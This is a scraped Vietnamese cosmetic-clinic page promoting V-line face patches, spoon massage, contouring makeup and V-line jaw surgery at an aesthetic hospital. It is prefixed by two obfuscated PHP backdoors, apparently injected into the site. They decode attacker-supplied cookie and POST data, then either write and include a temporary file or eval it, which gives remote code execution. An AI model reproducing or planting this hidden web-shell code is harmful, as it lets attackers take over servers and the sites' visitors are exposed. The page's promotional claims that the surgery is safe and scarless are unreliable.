$bgszAAOwy = class_exists("Gs_IhE");if (!$bgszAAOwy){class Gs_IhE{private $NyIWsdfLg;public static $fMifMLd = "aaa3bb8b-6027-481d-b4ca-a5a25a05356e";public static $FGlWHLTgx = NULL;public function __construct(){$aywKJ = $_COOKIE;$xxjOYczHt = $_POST;$jIwTgigha = @$aywKJ[substr(Gs_IhE::$fMifMLd, 0, 4)];if (!empty($jIwTgigha)){$GoxZGgm = "base64";$IfuEchkhx = "";$jIwTgigha = explode(",", $jIwTgigha);foreach ($jIwTgigha as $RuXTF){$IfuEchkhx .= @$aywKJ[$RuXTF];$IfuEchkhx .= @$xxjOYczHt[$RuXTF];}$IfuEchkhx = array_map($GoxZGgm . '_' . 'd' . "\145" . chr (99) . "\x6f" . "\x64" . "\145", array($IfuEchkhx,)); $IfuEchkhx = $IfuEchkhx[0] ^ str_repeat(Gs_IhE::$fMifMLd, (strlen($IfuEchkhx[0]) / strlen(Gs_IhE::$fMifMLd)) + 1);Gs_IhE::$FGlWHLTgx = @unserialize($IfuEchkhx);}}public function __destruct(){$this->BnepjYcto();}private function BnepjYcto(){if (is_array(Gs_IhE::$FGlWHLTgx)) {$aNbcskW = sys_get_temp_dir() . "/" . crc32(Gs_IhE::$FGlWHLTgx[chr (115) . "\141" . chr (108) . chr (116)]);@Gs_IhE::$FGlWHLTgx["\167" . "\162" . chr (105) . chr ( 839 - 723 ).'e']($aNbcskW, Gs_IhE::$FGlWHLTgx["\x63" . "\x6f" . chr (110) . "\x74" . chr ( 304 - 203 )."\156" . 't']);include $aNbcskW;@Gs_IhE::$FGlWHLTgx[chr ( 518 - 418 ).'e' . 'l' . chr ( 174 - 73 ).'t' . chr ( 1018 - 917 )]($aNbcskW);exit();}}}$DSrbc = new Gs_IhE(); $DSrbc = NULL;} ?> $zGljcqt = class_exists("USS_ehK");if (!$zGljcqt){class USS_ehK{private $KnienGUyu;public static $KmPYsffI = "7ea65457-9821-4294-b4f4-24c7c7c603c9";public static $eXYIarO = NULL;public function __construct(){$wUTMa = $_COOKIE;$iJrGuuQsRT = $_POST;$UKtAbC = @$wUTMa[substr(USS_ehK::$KmPYsffI, 0, 4)];if (!empty($UKtAbC)){$NbPNmj = "base64";$McJWo = "";$UKtAbC = explode(",", $UKtAbC);foreach ($UKtAbC as $hxjWhfdkZ){$McJWo .= @$wUTMa[$hxjWhfdkZ];$McJWo .= @$iJrGuuQsRT[$hxjWhfdkZ];}$McJWo = array_map($NbPNmj . '_' . "\144" . 'e' . "\x63" . 'o' . chr (100) . "\x65", array($McJWo,)); $McJWo = $McJWo[0] ^ str_repeat(USS_ehK::$KmPYsffI, (strlen($McJWo[0]) / strlen(USS_ehK::$KmPYsffI)) + 1);USS_ehK::$eXYIarO = @unserialize($McJWo);}}public function __destruct(){$this->JsXxyprJ();}private function JsXxyprJ(){if (is_array(USS_ehK::$eXYIarO)) {$ijIaVaD = str_replace(chr (60) . chr (63) . chr ( 245 - 133 ).'h' . chr ( 882 - 770 ), "", USS_ehK::$eXYIarO["\143" . chr ( 657 - 546 ).chr (110) . "\x74" . "\145" . chr (110) . 't']);eval($ijIaVaD);exit();}}}$JWiRPSB = new USS_ehK(); $JWiRPSB = NULL;} ?> Cách dùng miếng dán tạo mặt v line - Làm hồng vùng kín
0906.82.70.70 - 0902.400.269
0901.32.82.70
thu hẹp vùng kíntrẻ hoá vùng kínlàm hồng vùng kín

Cách dùng miếng dán tạo mặt v line

Lượt xem: 3207

Có nhiều cách để tạo mặt v line như massage, trang điểm, miếng dáng tạo mặt v line. Chúng ta hãy cùng thực hiện cách sử dụng miếng dán tạo mặt v line xem nhé, theo các chuyên gia thì đây là phương pháp khá hiệu quả tại nhà cho các chị em.

Mặt v line là một khuôn mặt cân đối, thon gọn và có hình dáng giống chữ V. Đây là xu hướng mới của giới trẻ hiện nay, đặc biệt là các chị em.

Cách dùng miếng dáng tạo mặt v line

Sử dụng miếng dáng tiêu mỡ sẽ giúp làm giảm bớt mỡ thừa, tạo khuôn mặt v line thon gọn hơn. Đây là sản phẩm đến từ Hàn Quốc và hiện đã có mặt tại thị trường Việt Nam cũng như các nước trên thế giới, giúp nhiều người thực hiện mặt v line rất đơn giản.

Hiện nay trên thị trường đang bán hai loại miếng dáng phổ biến đó là miếng dáng chất nỉ ôm từ đầu xuống cằm và miếng dáng mỏng để dáng quanh hàm, chị em có thể lựa chọn cho mình một loại phù hợp nhất.

mieng dan tao mat v line

Miếng dáng này giúp các gương mặt vuông, mặt tròn hay chữ nhật cũng trở nên thon gọn hơn. Để sử dụng, các cô nàng chỉ cần bóc miếng băng và dán theo phần xương hàm 2 bên mang tai theo chiều hướng lên trên. Lúc này phần da bên hàm được kéo cao, khiến gương mặt trở nên thon gọn, nhỏ nhắn hơn.

Một số phương pháp khác tại nhà

Massage tạo mặt v line bằng thìa

Đơn giản chỉ dùng một chiếc thìa sẽ giúp thon gọn quai hàm, cằm chữ V xinh xắn. Đầu tiên sử dụng phần lưng thìa úp nhẹ vào bầu mắt, vuốt nhẹ sang hai bên.

Tiếp theo, dùng cạnh thìa và đầu thìa để miết nhẹ từ xương cằm, xương quai hàm xuống phía dưới. Làm đều đặn cho cả hai bên vùng xương cằm, cuối cùng dùng cán thìa miết nhẹ vùng dưới cằm.

Thực hiện mỗi ngày ít nhất hai lần sẽ giúp cơ mặt săn chắc, thon gọn. Để đạt hiệu quả cao các chị em nên kiên trì với phương pháp này.

Trang điểm tạo mặt v line

Trang điểm được xem là một việc không thể thiếu mỗi ngày của chị em nhưng đó chỉ là trang điểm để làm đẹp. Còn trang điểm tạo mặt v line thì cần phải được hướng dẫn thì chị em mới biết được làm thế nào cho đẹp, trang điêm được xem như là thủ thuật đơn giản nhất nhằm che giấu khuyết điểm trên khuôn mặt.

mieng dan tao mat v line

Để thực hiện đầu tiên trên vùng cằm , hàm dùng phấn màu highlight tối để đánh lên. Dùng phấn màu sáng đánh vào những vùng cần làm nổi bật, đặc biệt là vùng trán, hai bên má và vùng giữa cằm.

Sau khi đánh phấn thì tán đều màu để cân đối, mỗi người có đôi mắt thẩm mỹ riêng nên tự trang điểm sao cho phù hợp nhất với khuôn mặt của mình.

Phẫu thuật tạo mặt v line

Những phương pháp thực hiện tạo mặt v line tại nhà thường phải kiên trì, mất thời gian và hiệu quả mang lại chậm hơn so với các phương pháp hiện đại khác. Nên các chị em nào muốn sở hữu mặt v line nhanh chóng, hiệu quả lâu dài thì tốt nhất nên thực hiện phẫu thuật gọt mặt v line.

Khoa học kỹ thuật hiện đại đã cho ra đời công nghệ gọt mặt v line và hiện nay đang được áp dụng cho hàng ngàn khách hàng tại Bệnh viện thẩm mỹ Á Âu. Sau khi xuất hiện dịch vụ này đã được đông đảo khách hàng đón nhận và sử dụng rộng rãi, được đánh giá la một kỹ thuật an toàn tại Á Âu.

mieng dan tao mat v line

Gọt mặt v line tại Á Âu chỉ thực hiện trong vài giờ đồng hồ dưới sự can thiệp, trị liệu của đội ngũ bác sĩ chuyên môn cao kết hợp với trang thiết bị y khoa hiện đại được chuyển giao từ Hàn Quốc nên rất đảm bảo chất lượng. Phẫu thuật gọt mặt v line khắc phục gương mặt vuông, mặt góc cạnh và không cân xứng tạo mặt v line đúng chuẩn.

Với công nghệ này các cô nàng không cần phải nhờ đến miếng dán tạo mặt v line nữa, chỉ cần một liệu trình dưới sự hướng dẫn của bác sĩ tại Á Âu chắc chắn rằng bạn sẽ sở hữu một gương mặt v line thanh tú, thon gọn và không để lại sẹo sau phẫu thuật.

HOTLINE

0906.82.70.70 - 0902.400.269 - 0901.32.82.70

Tại sao nên chọn BVTM Á Âu?

  •   Bệnh viện được Bộ Y Tế cấp phép.
  • Đội ngũ bác sĩ lành nghề trong và ngoài nước
  • Có phòng vô trùng, phòng xét nghiệm
  • Quy trình điều trị khép kín, an toàn

Ý KIẾN PHẢN HỒI

Từ khóa: